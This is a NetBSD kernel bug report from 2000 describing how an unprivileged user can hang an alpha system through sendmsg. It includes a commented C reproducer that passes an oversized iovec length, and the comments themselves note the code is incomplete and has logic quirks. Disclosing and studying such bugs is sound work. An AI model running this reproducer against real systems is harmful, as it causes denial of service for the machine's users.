Subject: kern/10070: sendmsg syscall may hang system on alpha
To: None <>
From: None <>
List: netbsd-bugs
Date: 05/08/2000 05:28:11
>Number:         10070
>Category:       kern
>Synopsis:       sendmsg syscall may hang system on alpha
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    kern-bug-people
>State:          open
>Class:          sw-bug
>Submitter-Id:   net
>Arrival-Date:   Mon May 08 05:29:00 PDT 2000
>Originator:     Juergen Weiss
>Release:        1.4.2
Universitaet Mainz
NetBSD netadmin.zdv.Uni-Mainz.DE 1.4.1 NetBSD 1.4.1 (LOCAL) #0: Mon Aug 16 18:27:14 MEST 1999     root@netadmin.zdv.Uni-Mainz.DE:/usr/src/sys/arch/alpha/compile/LOCAL alpha

Certain arguments to the sendmsg system call lead to an infinite
loop in the sosend kernel subroutine. The result is that the system
hangs: the process never gives up control, so no process switching
occurs. Any user can trigger this; no special privileges are
required.
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/uio.h>


     /*
      * Reproducer attached to PR kern/10070 (see the report text above):
      * a single sendmsg() carrying one oversized iovec, which the report
      * says drives sosend() into an infinite loop on alpha.  Presumably
      * the body of main(); the enclosing function and its closing brace
      * are not shown, and neither <strings.h> (bzero) nor <stdio.h>
      * (perror) is among the includes listed.
      */
     int sd;
     struct sockaddr_in addr;
     struct msghdr msg;
     struct iovec msg_iov;
     char buf[1000];                 /* the 1000-byte buffer the iovec points at */

     /* One iovec whose length, 4294967368 = 2^32 + 72, is far larger than
      * buf and does not fit in 32 bits; a 64-bit size_t (as on alpha) can
      * hold it, so the full value reaches the kernel.  Any kernel path that
      * narrows or sums such lengths in 32-bit arithmetic is the risk here. */
     bzero(&msg_iov, sizeof(msg_iov));
     msg_iov.iov_base = buf;
     msg_iov.iov_len = 4294967368;

     /* Message with exactly that one iovec and no name or control data. */
     bzero(&msg, sizeof(msg));
     msg.msg_iov = &msg_iov;
     msg.msg_iovlen = 1;

     /* Destination: loopback, TCP port 21.  Unlike msg and msg_iov, addr is
      * never zeroed, so its remaining fields (sin_zero, and sin_len on BSD)
      * hold whatever was on the stack. */
     addr.sin_family = AF_INET;
     addr.sin_port = htons(21);
     addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
     sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
     if (sd < 0)
         perror("socket err");       /* reported only; execution continues with sd == -1 */
     /* connect() receives a struct sockaddr_in * with no sockaddr cast.
      * As written, sendmsg() is issued only on the branch where connect()
      * returned an error; neither return value is otherwise checked. */
     if (connect(sd, &addr, sizeof(addr)) < 0)
     sendmsg(sd, &msg, 0);